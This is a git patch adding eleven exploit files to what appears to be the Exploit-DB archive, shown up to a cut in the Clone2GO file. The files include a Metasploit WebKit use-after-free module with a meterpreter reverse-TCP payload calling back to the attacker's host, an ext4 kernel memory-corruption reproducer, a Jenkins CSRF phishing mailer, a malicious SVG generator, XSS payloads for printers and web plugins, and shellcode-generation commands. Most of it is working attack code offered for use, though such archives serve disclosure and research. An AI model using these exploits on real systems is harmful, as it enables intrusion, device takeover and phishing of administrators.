From ad4b4f15f3192dece3dd4adc0fa4c607d7aad959 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 6 Jun 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-06-06 11 changes to exploits/shellcodes Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Clone2GO Video converter 2.8.2 - Buffer Overflow 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH) 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH) WebKitGTK+ < 2.21.3 - Crash (PoC) WebKit - not_number defineProperties UAF (Metasploit) EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Brother HL Series Printers 1.15 - Cross-Site Scripting Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email) --- exploits/hardware/webapps/44839.md | 74 +++++++ exploits/ios/remote/44836.rb | 302 ++++++++++++++++++++++++++++ exploits/linux/dos/44832.txt | 282 ++++++++++++++++++++++++++ exploits/linux/local/44842.txt | 66 ++++++ exploits/linux/webapps/44843.py | 219 ++++++++++++++++++++ exploits/php/webapps/44833.txt | 25 +++ exploits/php/webapps/44837.py | 33 +++ exploits/windows/local/44834.py | 34 ++++ exploits/windows_x86/local/44838.py | 75 +++++++ exploits/windows_x86/local/44840.py | 71 +++++++ exploits/windows_x86/local/44841.py | 85 ++++++++ files_exploits.csv | 15 +- 12 files changed, 1279 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/44839.md create mode 100755 exploits/ios/remote/44836.rb create mode 100644 exploits/linux/dos/44832.txt create mode 100644 exploits/linux/local/44842.txt create mode 100755 exploits/linux/webapps/44843.py create mode 100644 exploits/php/webapps/44833.txt create mode 100755 exploits/php/webapps/44837.py create mode 100755 exploits/windows/local/44834.py create mode 100755 exploits/windows_x86/local/44838.py create mode 100755 exploits/windows_x86/local/44840.py create mode 100755 exploits/windows_x86/local/44841.py diff --git a/exploits/hardware/webapps/44839.md b/exploits/hardware/webapps/44839.md new file mode 100644 index 000000000..12535d46d --- /dev/null +++ b/exploits/hardware/webapps/44839.md @@ -0,0 +1,74 @@ +# Exploit Title: [ XSS at Brother HL series printers] + + +# Date: [30.05.2018] + +# Exploit Author: [Huy Kha] + +# Vendor Homepage: [http://support.brother.com] + +# Software Link: [ Website ] + +# Version: Brother HL series printers. + +# Tested on: Mozilla FireFox + +# Reflected XSS Payload : + +"--!>" + +# Description : Starting searching for printers without having a password. +When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it. + + +# PoC : +If you want to execute the XSS you need to be loged into the web interface first. + +# Example : + +1. Go to the following url: http://127.0.0.1/ +2. Login with ''admin'' as password +3. Intercept now the request with Burpsuite +4. The XSS exist in the loginerror.html?url= parameter + +4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 + + +# Request : + +GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: nl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + + +# Response : + +HTTP/1.1 200 OK +Cache-Control: no-cache +Content-Length: 3389 +Content-Type: text/html +Content-Language: nl +Connection: close +Server: debut/1.20 +Pragma: no-cache + + + + Brother HL-L2340D series

HL-L2340D series

Log in"&pageid=241"/>
    • Algemeen

+ + + +# How to fix it? : Update the printer to Firmware 1.16 and set a new password. + +# Screenshot : https://imgur.com/a/3OVTSZ4 + + +# Note: The vendor has been contacted on 30-5-2018. \ No newline at end of file diff --git a/exploits/ios/remote/44836.rb b/exploits/ios/remote/44836.rb new file mode 100755 index 000000000..0d929dc5a --- /dev/null +++ b/exploits/ios/remote/44836.rb @@ -0,0 +1,302 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WebKit not_number defineProperties UAF', + 'Description' => %q{ + This module exploits a UAF vulnerability in WebKit's JavaScriptCore library. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'qwertyoruiop', # jbme.qwertyoruiop.com + 'siguza', # PhoenixNonce + 'tihmstar', # PhoenixNonce + 'timwr', # metasploit integration + ], + 'References' => [ + ['CVE', '2016-4655'], + ['CVE', '2016-4656'], + ['CVE', '2016-4657'], + ['BID', '92651'], + ['BID', '92652'], + ['BID', '92653'], + ['URL', 'https://blog.lookout.com/trident-pegasus'], + ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'], + ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'], + ['URL', 'https://github.com/Siguza/PhoenixNonce'], + ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], + ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], + ], + 'Arch' => ARCH_AARCH64, + 'Platform' => 'apple_ios', + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, + 'Targets' => [[ 'Automatic', {} ]], + 'DisclosureDate' => 'Aug 25 2016')) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), + OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ]) + ]) + end + + def on_request_uri(cli, request) + print_status("Request from #{request['User-Agent']}") + if request.uri =~ %r{/loader$} + print_good("Target is vulnerable.") + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" ) + loader_data = File.read(local_file, {:mode => 'rb'}) + send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) + return + elsif request.uri =~ %r{/exploit$} + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" ) + loader_data = File.read(local_file, {:mode => 'rb'}) + payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}" + payload_url_index = loader_data.index('PAYLOAD_URL') + loader_data[payload_url_index, payload_url.length] = payload_url + send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) + print_status("Sent exploit (#{loader_data.size} bytes)") + return + end + html = %Q^ + + + + + + ^ + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file diff --git a/exploits/linux/dos/44832.txt b/exploits/linux/dos/44832.txt new file mode 100644 index 000000000..06960e71e --- /dev/null +++ b/exploits/linux/dos/44832.txt @@ -0,0 +1,282 @@ +ext4 can store data for small regular files as "inline data", meaning that the +data is stored inside the corresponding inode instead of in separate blocks. +Inline data is stored in two places: The first 60 bytes go in the i_block field +in the inode (which normally contains a list of blocks instead), the rest goes +in the special filesystem-internal extended attribute "system.data". + +Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can +store extended attribute values not only inline in the inode, but can also store +such values in dedicated inodes. + +When a corrupted filesystem stores the system.data extended attribute value in a +dedicated inode, the kernel gets confused, causing memory corruption. + + + +ext4_find_inline_data_nolock() attempts to locate an inode's inline data by +searching for the system.data xattr using ext4_xattr_ibody_find(). +If the inode has xattrs, ext4_xattr_ibody_find() first checks them for +corruption using xattr_check_inode(), then grabs the wanted xattr using +xattr_find_entry(). +xattr_check_inode() uses ext4_xattr_check_entries() to check the individual +xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr +whose value is in a dedicated inode) - only for inline values, length and offset +checks are performed to ensure that the value actually fits into the inode. +The problem is that ext4_find_inline_data_nolock() then assumes that the +returned xattr uses inline storage and that the returned length will fit into +the inode; it stores the length field from the xattr in +`EXT4_I(inode)->i_inline_size` without further checks. + +Later, when the file is read, ext4_read_inline_data() trusts this length value, +causing an out-of-bounds memcpy() in the following line: + + memcpy(buffer, + (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); + + + +To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: + +1. Create a new ext4 filesystem image, with 256-byte inodes and inline data +support: + + $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k + mke2fs 1.43.7 (16-Oct-2017) + Creating regular file testfs.img + + Filesystem too small for a journal + Creating filesystem with 100 4k blocks and 64 inodes + + Allocating group tables: done + Writing inode tables: done + Writing superblocks and filesystem accounting information: done + +2. Create a 75-byte file in the new filesystem: + + $ mkdir mount + $ sudo mount testfs.img mount + $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile + 1+0 records in + 1+0 records out + 75 bytes copied, 0.000811554 s, 92.4 kB/s + $ sudo umount mount + +3. Bump up the inode size, bump up the xattr size, and mark the xattr value as + non-inline: + + $ cat fixup.c + #include + #include + #include + #include + #include + #include + #include + + #define __le16 uint16_t + #define __le32 uint32_t + #define __u16 uint16_t + #define __u32 uint32_t + #define __u8 uint8_t + + /* some definitions from kernel headers */ + #define EXT4_NDIR_BLOCKS 12 + #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS + #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) + #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) + #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) + #define EXT4_XATTR_MAGIC 0xEA020000 + struct ext4_inode { + __le16 i_mode; + __le16 i_uid; + __le32 i_size_lo; + __le32 i_atime; + __le32 i_ctime; + __le32 i_mtime; + __le32 i_dtime; + __le16 i_gid; + __le16 i_links_count; + __le32 i_blocks_lo; + __le32 i_flags; + union { + struct { + __le32 l_i_version; + } linux1; + } osd1; + __le32 i_block[EXT4_N_BLOCKS]; + __le32 i_generation; + __le32 i_file_acl_lo; + __le32 i_size_high; + __le32 i_obso_faddr; + union { + struct { + __le16 l_i_blocks_high; + __le16 l_i_file_acl_high; + __le16 l_i_uid_high; + __le16 l_i_gid_high; + __le16 l_i_checksum_lo; + __le16 l_i_reserved; + } linux2; + } osd2; + __le16 i_extra_isize; + __le16 i_checksum_hi; + __le32 i_ctime_extra; + __le32 i_mtime_extra; + __le32 i_atime_extra; + __le32 i_crtime; + __le32 i_crtime_extra; + __le32 i_version_hi; + __le32 i_projid; + }; + struct ext4_xattr_ibody_header { + __le32 h_magic; + }; + struct ext4_xattr_entry { + __u8 e_name_len; + __u8 e_name_index; + __le16 e_value_offs; + __le32 e_value_inum; + __le32 e_value_size; + __le32 e_hash; + char e_name[0]; + }; + + #define INODE_SIZE 256 + + #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) + + int main(int argc, char **argv) { + char *path = argv[1]; + int fd = open(path, O_RDWR); + if (fd == -1) err(1, "open"); + struct stat st; + if (fstat(fd, &st)) err(1, "fstat"); + char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + if (map == MAP_FAILED) err(1, "mmap"); + for (int i=0; ii_links_count != 1 || ino->i_size_lo != 75) continue; + printf("found inode (idx=%d, size=%u, mode=%ho)\n", + i, ino->i_size_lo, ino->i_mode); + ino->i_size_lo = 60000; + printf(" i_extra_isize = %hu\n", ino->i_extra_isize); + struct ext4_xattr_ibody_header *hdr = + (void*)( ((char*)ino)+128+ino->i_extra_isize ); + if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; + struct ext4_xattr_entry *entry = (void*)(hdr+1); + while (*(uint32_t*)entry != 0) { + printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", + entry->e_name_index, entry->e_name_len, entry->e_name, + entry->e_value_offs, entry->e_value_inum, entry->e_value_size); + entry->e_value_offs = 0; + entry->e_value_inum = 20; + entry->e_value_size = 60000; + entry = (void*)( + (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) + ); + } + } + } + $ gcc -o fixup fixup.c -Wall + $ ./fixup testfs.img + found inode (idx=555, size=75, mode=100644) + i_extra_isize = 32 + attr: idx=7 name='data' offs=76 inum=0 size=15 + +4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): + + $ fsck.ext4 -f testfs.img + e2fsck 1.43.7 (16-Oct-2017) + Pass 1: Checking inodes, blocks, and sizes + Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate? no + Extended attribute in inode 12 has a value size (60000) which is invalid + Clear? no + Inode 12 passes checks, but checksum does not match inode. Fix? yes + Pass 2: Checking directory structure + Pass 3: Checking directory connectivity + Pass 4: Checking reference counts + Pass 5: Checking group summary information + + testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** + + testfs.img: ********** WARNING: Filesystem still has errors ********** + + testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks + +5. Mount the filesystem again: + + $ sudo mount testfs.img mount + +6. Read the file: + + $ hexdump -C mount/testfile + 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + * + 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| + 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| + 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + * + 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| + 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| + 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| + 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| + 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + [...] + +7. Check dmesg: + + $ dmesg + [...] + [ 3211.552729] ================================================================== + [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 + + [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 + [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 + [ 3211.552799] Call Trace: + [ 3211.552807] dump_stack+0x71/0xab + [ 3211.552813] print_address_description+0x6a/0x250 + [ 3211.552817] kasan_report+0x258/0x380 + [ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552867] memcpy+0x34/0x50 + [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] + [ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4] + [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] + [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] + [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 + [ 3211.553112] ? filemap_range_has_page+0x160/0x160 + [ 3211.553116] ? save_stack+0x89/0xb0 + [ 3211.553120] ? __kasan_slab_free+0x105/0x150 + [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 + [ 3211.553128] ? do_syscall_64+0x150/0x160 + [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 + [ 3211.553137] ? audit_watch_compare+0x1b/0x50 + [ 3211.553142] __vfs_read+0x239/0x340 + [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 + [ 3211.553149] ? dput.part.19+0x2e/0x1b0 + [ 3211.553154] ? auditd_test_task+0x43/0x60 + [ 3211.553158] vfs_read+0xa5/0x190 + [ 3211.553162] ksys_read+0xa1/0x120 + [ 3211.553166] ? kernel_write+0xa0/0xa0 + [ 3211.553171] do_syscall_64+0x6d/0x160 + [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 + [ 3211.553178] RIP: 0033:0x7f9ada1af72c + [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 + [...] + [ 3211.553197] The buggy address belongs to the page: + [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 + [ 3211.553207] flags: 0x17fffc000000021(locked|lru) + [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff + [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 + [ 3211.553222] page dumped because: kasan: bad access detected + [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 + + [ 3211.553229] Memory state around the buggy address: + [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553246] ^ + [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553257] ================================================================== \ No newline at end of file diff --git a/exploits/linux/local/44842.txt b/exploits/linux/local/44842.txt new file mode 100644 index 000000000..3cb31787e --- /dev/null +++ b/exploits/linux/local/44842.txt @@ -0,0 +1,66 @@ +# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) +# Author: Dhiraj Mishra +# Date: 2018-06-05 +# Software: https://webkitgtk.org/ +# CVE: CVE-2018-11646 +# Summary: +# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in +# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, +# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue. + +# PoC: + + + + +Backtrace using fedora 27: + +#0 WTF::StringImpl::rawHash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508 +#1 WTF::StringImpl::hasHash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514 +#2 WTF::StringImpl::hash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525 +#3 WTF::StringHash::hash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73 +#9 WTF::HashMap, WTF::HashTraits >::get +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406 +#10 webkitFaviconDatabaseSetIconURLForPageURL +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193 +#11 webkitFaviconDatabaseSetIconForPageURL +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318 +#12 webkitWebViewSetIcon +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964 +#13 WTF::Function::performCallbackWithReturnValue +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108 +#15 WebKit::WebPageProxy::dataCallback +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083 +#16 WebKit::WebPageProxy::finishedLoadingIcon +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848 +#17 IPC::callMemberFunctionImpl::operator() +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68 +#29 WTF::RunLoop::::_FUN(gpointer) +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70 +#30 g_main_dispatch +at gmain.c line 3148 +#31 g_main_context_dispatch +at gmain.c line 3813 +#32 g_main_context_iterate +at gmain.c line 3886 +#33 g_main_context_iteration +at gmain.c line 3947x +#34 g_application_run +at gapplication.c line 2401 +#35 main +at ../src/ephy-main.c line 432 + + +# Reference's: +# https://bugs.webkit.org/show_bug.cgi?id=186164 +# https://bugzilla.gnome.org/show_bug.cgi?id=795740 \ No newline at end of file diff --git a/exploits/linux/webapps/44843.py b/exploits/linux/webapps/44843.py new file mode 100755 index 000000000..ff4cf496b --- /dev/null +++ b/exploits/linux/webapps/44843.py @@ -0,0 +1,219 @@ +# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery +# Date : 2018-06-05 +# Exploit Author : Kl3_GMjq6 +# Vendor Homepage : https://jenkins.io/ +# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi] +# Version: [Below Version 1.20 (1.1 ~ 1.20) ] +# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774 +# Tested on : Linux , Windows +# CVE : CVE-2018-8718 + +import email.message +import smtplib +import getpass + +payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw'] +table = {} +for i in payload_list : + table.update({i:''}) + +def send_mail() : + msg = email.message.Message() + msg['Subject'] = table['subject'] + msg['From'] = table['sender'] + msg['To'] = table['reciver'] + msg.add_header('Content-Type','text/html') + msg.set_payload('\ +'+table['cover_message']+'') + s = smtplib.SMTP(table['smtp_server']) + s.starttls() + s.login(table['l_id'], + table['l_pw']) + s.sendmail(msg['From'], [msg['To']], msg.as_string()) + +def url_set() : + url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : ")) + if len(url) <= 0 : + print (" Can't Be Null!") + url_set() + elif url[0:4] != "http" : + print (" URL must start with 'http://' ") + url_set() + else : table['url'] = url + +def subject_set() : + subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : ")) + if len(subject) <= 0 : + subject = "Look! Waning with your Jenkins" + table['subject'] = subject + +def cover_message() : + cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : ")) + if len(cover_message) <= 0 : + cover_message = "Here is your Vulnable!" + table['cover_message'] = cover_message + +def sender() : + sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : ")) + if len(sender) <= 0 : + print (" Can't Be Null!") + sender() + else : table['sender'] = sender + +def reciver() : + reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : ")) + if len(reciver) <= 0 : + print (" Can't Be Null!") + reciver() + else : table['reciver'] = reciver + +def test_email() : + test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : ")) + if len(test_email) <= 0 : + print (" Can't Be Null!") + test_email() + table['test_email'] = test_email + +def smtp_server() : + smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : ")) + if len(smtp_server) <= 0 : + smtp_server = "smtp.gmail.com" + table['smtp_server'] = smtp_server + +def l_id() : + l_id = str(input ("Your SMTP_Server ID : ")) + if len(l_id) <= 0 : + print (" Can't Be Null!") + l_id() + table['l_id'] = l_id + +def l_pw() : + l_pw = str(getpass.getpass("Your SMTP_Server PW : ")) + if len(l_pw) <= 0 : + print (" Can't Be Null!") + l_pw() + table['l_pw'] = l_pw + +def set_all () : + url_set() + subject_set() + cover_message() + sender() + reciver() + test_email() + smtp_server() + l_id() + l_pw() + print ("Setting Complit! Use 'show' to check options") + +set_help = { + 'all':"Set all payload", + 'help':"Show set commend's help", + 'url_set':"Set only 'url_set' payload", + 'subject_set':"Set only 'url_set' payload", + 'cover_message':"Set only 'cover_message' payload", + 'sender':"Set only 'sender' payload", + 'reciver':"Set only 'reciver' payload", + 'test_email':"Set only 'test_email' payload", + 'smtp_server':"Set only 'smtp_server' payload", + 'l_id':"Set only 'l_id' payload", + 'l_pw':"Set only 'l_pw' payload", + } + +def set_select (a) : + if a=="all" : set_all() + elif a=="url_set" : url_set() + elif a=="subject_set" : subject_set() + elif a=="cover_message" : cover_message() + elif a=="sender" : sender() + elif a=="reciver" : reciver() + elif a=="test_email" : test_email() + elif a=="smtp_server" : smtp_server() + elif a=="l_id" : l_id() + elif a=="l_pw" : l_pw() + elif a=="help" : + for i in set_help : + print (" -%-20s %-s" %(i,set_help[i])) + print ('') + + + +while True : + direct = str(input ("CVE-2018-8718 >> ")).lower() + + if direct == "help" : + print ("""\ + %-10s Show this help menu. + %-10s [-all / -help / -url_set / -subject_set / .... ] + %-10s Set the Payload + %-10s [-all] Show Current Setting. + %-10s Send CSRF use current setting. + """ %("help","set","","show","send")) + + elif direct[0:3] == "set" : + if ' -' not in direct : + if direct == "set" : + set_option = ["help"] + else : + print (" Option error \n") + else : + set_option = direct.split(' -')[1:] + okay = 1 + + if len(set_option) == 1 : + if set_option[0] not in set_help : + print (" Option error \n") + else : + set_select(set_option[0]) + elif len(set_option) >= 2 : + for i in set_option : + if i in ['help', 'all'] : + print (" *Option [-help / -all] cannot be use with another options \n") + okay = 0 + break + for i in set_option : + if i not in set_help : + print (" Option error \n") + okay = 0 + break + if okay == 1 : + for i in set_option : + set_select(i) + + elif direct[:4] == "show" : + if " -" not in direct : + + if direct == "show" : + for i in table : + if i != "l_pw" : + print (" %-20s %s" %(i,table[i])) + print (" If you want to see l_pw... add [-all] option") + print ("") + else : + print (" Option error \n") + else : + show_option = direct.split(" -")[1:] + if (len(show_option) == 1 and show_option[0] == 'all') : + for i in table : + print (" %-20s %s" %(i,table[i])) + print () + else : + print (" Option error \n") + + elif direct == "send" : + print (" Sending CSRF Mail.....") + try : + send_mail() + print (" Succed!!\n") + except : + print (" Fail....") + + elif direct == "exit" : + break + + else : + print (" Usage : help\n") \ No newline at end of file diff --git a/exploits/php/webapps/44833.txt b/exploits/php/webapps/44833.txt new file mode 100644 index 000000000..536149cc1 --- /dev/null +++ b/exploits/php/webapps/44833.txt @@ -0,0 +1,25 @@ +# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting +# Date: 6/2/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=842 +# Version: 1.0 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-11715 + + +1. Description: +Creates a page that shows threads that the user has posted in when they have unread replies. + + + +2. Proof of Concept: + +- Create or reply to a thread with the following subject +- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads + + + +3. Solution: +Update to 1.1 \ No newline at end of file diff --git a/exploits/php/webapps/44837.py b/exploits/php/webapps/44837.py new file mode 100755 index 000000000..7590412ee --- /dev/null +++ b/exploits/php/webapps/44837.py @@ -0,0 +1,33 @@ +# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator +# Author : DEEPIN2 +# Date: 2018-06-05 +# Vendor: Pagekit +# Sotware: https://pagekit.com/ +# Version: < 1.0.13 +# CVE: 2018-11564 +# python3 required + +def makesvg(name, code): + code = '' + code + '' + f = open(name, 'w+') + f.write(code) + f.close + + +if __name__ == '__main__': + print(''' + ______ _______ ____ ___ _ ___ _ _ ____ __ _ _ + / ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || | +| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ +| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _| + \____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_| + [*] Author : DEEPIN2(Junseo Lee)''') + print('[*] enter name without extension, ex) test.svg -> test') + filename = input('Filename : ') + '.svg' + print('[*] If you want to use alert(), type "alert("bla..bla..")"') + scriptcode = input('Script code : ') + try: + makesvg(filename, scriptcode) + print('[+] Successfully make venom file "%s"' %filename) + except Error as e: + print(e) \ No newline at end of file diff --git a/exploits/windows/local/44834.py b/exploits/windows/local/44834.py new file mode 100755 index 000000000..ce240ae0f --- /dev/null +++ b/exploits/windows/local/44834.py @@ -0,0 +1,34 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------------------# +# Exploit Title : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution) # +# Exploit Author : Gokul Babu # +# Organisation : Arridae Infosec P.V Ltd # +# Vendor Homepage : http://www.clone2go.com/products/videoconverter.php # +# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe # +# Tested on : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change # +# Steps to reproduce : Open the evil.txt paste the contents in Options -> Set output folder -> Browse # +#----------------------------------------------------------------------------------------------------------------------# + +#payload generation method +#msfpayload windows/exec CMD=calc.exe R > calc.raw +#./alpha2 eax --unicode --uppercase 